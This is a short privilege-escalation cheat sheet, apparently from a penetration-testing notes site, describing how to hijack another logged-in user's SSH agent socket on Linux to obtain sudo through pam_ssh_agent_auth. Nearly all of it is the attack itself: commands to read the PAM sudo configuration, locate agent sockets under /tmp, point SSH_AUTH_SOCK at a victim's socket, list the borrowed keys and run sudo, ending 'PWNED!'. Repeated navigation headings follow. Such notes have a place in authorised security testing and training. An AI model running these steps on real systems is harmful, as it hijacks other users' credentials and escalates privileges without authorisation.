SSH agent socket file access

STEPS:

1) Check if PAM for sudo has been configured to accept SSH keys:

cat /etc/pam.d/sudo

File contents

auth sufficient pam_ssh_agent_auth.so file=/etc/ssh/sudo_authorized_keys

session    required   pam_env.so readenv=1 user_readenv=0
session    required   pam_env.so readenv=1 envfile=/etc/default/locale user_readenv=0
@include common-auth
@include common-account
@include common-session-noninteractive

2) Check if the user that has signed in has used sudo:

ps aux

3) Find an SSH agent socket file fot the shell process we can access:

ls -la  /tmp/ssh-WHATEVER/agent.####

4)

export SSH_AUTH_SOCK=/tmp/ssh-WHATEVER/agent.####

5)

ssh-add -l

6)

sudo -l

7) PWNED!

PreviousRuby YAML Deserialization NextShared Library

Last updated 8 months ago

hashtagSTEPS:

hashtag1) Check if PAM for sudo has been configured to accept SSH keys:

hashtagFile contents

hashtag2) Check if the user that has signed in has used sudo:

hashtag3) Find an SSH agent socket file fot the shell process we can access:

hashtag4)

hashtag5)

hashtag6)

hashtag7) PWNED!

STEPS:

1) Check if PAM for sudo has been configured to accept SSH keys:

File contents

2) Check if the user that has signed in has used sudo:

3) Find an SSH agent socket file fot the shell process we can access:

4)

5)

6)

7) PWNED!